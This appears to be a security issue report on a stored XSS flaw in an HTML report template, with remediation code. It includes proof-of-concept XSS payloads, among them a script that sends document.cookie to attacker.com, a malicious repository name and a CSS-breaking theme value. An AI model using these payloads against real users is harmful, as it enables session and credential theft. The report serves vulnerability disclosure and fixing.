SECURITY: Stored XSS in HTML Report via Unsanitized Repository Data #54

@jeremyeder

Vulnerability Summary

Severity: HIGH (CVSS 7.1)
CWE: CWE-79 (Cross-Site Scripting - Stored)
Location: src/agentready/templates/report.html.j2:716-717
Impact: Arbitrary JavaScript execution when viewing HTML reports

Description

The HTML report template embeds assessment data as JavaScript without proper sanitization, allowing XSS attacks via malicious repository content.

<!-- VULNERABLE CODE (report.html.j2:716-717) -->
<script>
    // Embedded assessment data (properly escaped to prevent XSS)
    const ASSESSMENT = JSON.parse({{ assessment_json|tojson }});
    
    // Embedded theme data
    const THEMES = JSON.parse({{ available_themes_json|tojson }});
</script>

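The comment claims the data is "properly escaped", but the template relies on double JSON encoding (an already-serialized JSON string passed through tojson and then JSON.parse), which is INSUFFICIENT.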

Vulnerability Analysis

While tojson provides some escaping, the attack surface includes:

  1. Repository metadata (name, path, commit messages)
  2. Finding evidence (file contents, error messages)
  3. Remediation content (commands, examples, citations)
  4. User configuration (YAML deserialization)

Attack Vector 1: Malicious Repository Name

# Attacker creates repository with XSS payload
git init "MyRepo</script><img src=x onerror=alert(document.cookie)><script>"
cd "MyRepo</script><img src=x onerror=alert(document.cookie)><script>"

When assessed, the report contains:

const ASSESSMENT = JSON.parse("{\"repository\": {\"name\": \"MyRepo</script>...\"}}")
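Whether the `</script>` sequence actually survives depends on how the JSON is serialized, so it is worth checking the rendered report. A minimal sketch using only Python's standard `json` module (the `dump_for_script` helper is hypothetical and not part of agentready) shows that plain `json.dumps` leaves `<` and `/` untouched, while replacing the HTML-significant characters with `\uXXXX` escapes keeps the payload inert and still round-trips:

```python
import json


def dump_for_script(data) -> str:
    """Serialize data to JSON that cannot terminate a <script> element.

    Hypothetical helper, for illustration only.
    """
    text = json.dumps(data)
    # In JSON output, <, > and & can only occur inside string literals,
    # so replacing them with \uXXXX escapes keeps the document valid.
    return (
        text.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


payload = {"repository": {"name": "MyRepo</script><img src=x onerror=alert(1)>"}}

raw = json.dumps(payload)
safe = dump_for_script(payload)

print("</script>" in raw)           # True
print("</script>" in safe)          # False
print(json.loads(safe) == payload)  # True
```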

Attack Vector 2: Malicious Finding Evidence

A crafted assessor returns a finding with:

evidence = ['<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>']

This is embedded in the report and executes when the user opens it.
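One way to neutralize this kind of payload is to HTML-escape every string before it reaches the template. The sketch below assumes the report script inserts these values as HTML (for example via `innerHTML`); if it uses `textContent` instead, escaping here would double-encode. The `escape_strings` helper and the shape of the `finding` dict are hypothetical:

```python
import html


def escape_strings(value):
    """Recursively HTML-escape every string value in a nested structure."""
    if isinstance(value, str):
        return html.escape(value, quote=True)
    if isinstance(value, dict):
        # Only values are escaped; keys are assumed to be trusted field names.
        return {key: escape_strings(item) for key, item in value.items()}
    if isinstance(value, (list, tuple)):
        return [escape_strings(item) for item in value]
    return value  # numbers, booleans and None pass through unchanged


finding = {
    "status": "fail",
    "score": 0,
    "evidence": ['<script>fetch("https://attacker.com/steal")</script>'],
}

escaped = escape_strings(finding)
print(escaped["evidence"][0])
# &lt;script&gt;fetch(&quot;https://attacker.com/steal&quot;)&lt;/script&gt;
```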

Attack Vector 3: Theme Injection

If custom themes allow user-controlled CSS variables:

custom_theme = {
    "background": "red; } </style><script>alert('XSS')</script><style>"
}
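A payload like this can be rejected before rendering by validating theme values against an allowlist. The following is a sketch under the assumption that theme values are plain CSS colors (hex or named); `is_safe_css_color` and `validate_theme` are hypothetical names, and a real theme schema may need more value types:

```python
import re

# Assumption: theme values are simple colors such as "#1e1e2e" or "white".
_HEX_COLOR = re.compile(r"#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})")
_NAMED_COLOR = re.compile(r"[a-zA-Z]{1,30}")


def is_safe_css_color(value: str) -> bool:
    """Accept only hex colors and purely alphabetic color names."""
    return bool(_HEX_COLOR.fullmatch(value) or _NAMED_COLOR.fullmatch(value))


def validate_theme(theme: dict[str, str]) -> dict[str, str]:
    """Return the theme unchanged, or raise ValueError naming the bad key."""
    for key, value in theme.items():
        if not isinstance(value, str) or not is_safe_css_color(value):
            raise ValueError(f"unsafe value for theme key {key!r}")
    return theme


validate_theme({"background": "#1e1e2e", "text": "white"})  # passes

malicious = {"background": "red; } </style><script>alert('XSS')</script><style>"}
try:
    validate_theme(malicious)
except ValueError as exc:
    print(exc)  # unsafe value for theme key 'background'
```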

Security Impact

  • Session hijacking: Steal authentication cookies
  • Credential theft: Capture API keys, tokens displayed in report
  • Phishing: Redirect user to malicious site
  • Report tampering: Modify scores, hide vulnerabilities
  • Information disclosure: Exfiltrate assessment data

Remediation

Immediate Fix (P0)

  1. Use Jinja2's autoescaping properly:
{# SECURITY: Enable strict autoescaping for all contexts #}
{% autoescape true %}
<script>
    // SECURITY: Encode via tojson so the data cannot break out of the script element
    // Why: Assessment data contains user-controlled repository content
    // Prevents: Stored XSS (CWE-79)
    const ASSESSMENT = {{ assessment_json|tojson|safe }};
    const THEMES = {{ available_themes_json|tojson|safe }};
</script>
{% endautoescape %}
  2. Sanitize data before template rendering:
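# reporters/html.py
import json

def sanitize_for_js(data: dict) -> str:
    """Serialize data to JSON that is safe to embed inside a <script> element."""
    # Convert to JSON (the default ensure_ascii=True also escapes U+2028/U+2029)
    json_str = json.dumps(data)

    # Escape HTML-significant characters as \uXXXX sequences. Unlike
    # html.escape(), this keeps the string valid JSON: entities such as
    # &quot; are not decoded inside <script>, so they would corrupt the data.
    # Escaping '<' also covers the '</' and '<!--' sequences.
    escaped = json_str.replace('<', '\\u003c')
    escaped = escaped.replace('>', '\\u003e')
    escaped = escaped.replace('&', '\\u0026')

    return escaped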

template_data = {
    # ... other fields ...
    "assessment_json": sanitize_for_js(assessment.to_dict()),
    "available_themes_json": sanitize_for_js(available_themes),
}
  3. Add Content Security Policy (already present, but verify):
<meta http-equiv="Content-Security-Policy" 
      content="default-src 'none'; 
               script-src 'unsafe-inline'; 
               style-src 'unsafe-inline';
               img-src data:;">

CRITICAL: Remove 'unsafe-inline' from script-src by moving inline scripts to an external file or by using nonces.
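For the nonce option, the reporter could generate a fresh random value on each render and pass it to the template. This is a sketch only: `build_csp`, `csp`, and `script_nonce` are hypothetical names, and the template would need to emit the policy in its `<meta>` tag and add `nonce="{{ script_nonce }}"` to each inline `<script>`:

```python
import secrets


def build_csp(nonce: str) -> str:
    """Build a CSP value that only allows scripts carrying the given nonce."""
    return (
        "default-src 'none'; "
        f"script-src 'nonce-{nonce}'; "
        "style-src 'unsafe-inline'; "
        "img-src data:"
    )


# Generate a new, unpredictable nonce for every rendered report.
nonce = secrets.token_urlsafe(16)
csp = build_csp(nonce)

# Hypothetical template variables consumed by report.html.j2.
template_data = {"csp": csp, "script_nonce": nonce}
print(csp)
```

Because the nonce is chosen at render time, markup injected through repository data cannot know it in advance, so injected `<script>` elements and inline event handlers are blocked by the policy.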

Additional Protections

  1. Input validation on repository metadata:

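    import re

    # Validate that the repository name contains no HTML/JS metacharacters.
    # fullmatch() is used because `$` with match() also accepts a trailing newline.
    SAFE_NAME_PATTERN = re.compile(r'[a-zA-Z0-9._-]+')
    if not SAFE_NAME_PATTERN.fullmatch(repo.name):
        repo.name = "untrusted-repository"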
  2. Sanitize finding evidence:

    def sanitize_evidence(evidence: list[str]) -> list[str]:
        """Strip HTML tags from evidence."""
        import re
        return [re.sub(r'<[^>]+>', '', item) for item in evidence]
  3. Use DOMPurify for JavaScript:

    <script src="https://cdn.jsdelivr.net/npm/dompurify@3.0.0/dist/purify.min.js"></script>
    <script>
        const ASSESSMENT = DOMPurify.sanitize({{ assessment_json|tojson }});
    </script>
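One caveat on the tag-stripping approach in `sanitize_evidence`: the regex only removes complete tags, so a fragment with no closing `>` passes through unchanged and may still be parsed as markup once it is concatenated with later content. The short check below (with `strip_tags` as a hypothetical stand-in for the same regex) illustrates this, and shows escaping as an alternative that does not depend on recognizing tags:

```python
import html
import re

TAG_PATTERN = re.compile(r"<[^>]+>")


def strip_tags(item: str) -> str:
    """Apply the same regex approach as sanitize_evidence."""
    return TAG_PATTERN.sub("", item)


complete = "<script>alert(1)</script>"
unclosed = "<img src=x onerror=alert(1)"

print(strip_tags(complete))              # alert(1)
print(strip_tags(unclosed) == unclosed)  # True: no closing '>', nothing removed
print(html.escape(unclosed))             # &lt;img src=x onerror=alert(1)
```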

Related Issues

  • Markdown report may have injection via malicious content
  • YAML deserialization could inject malicious data
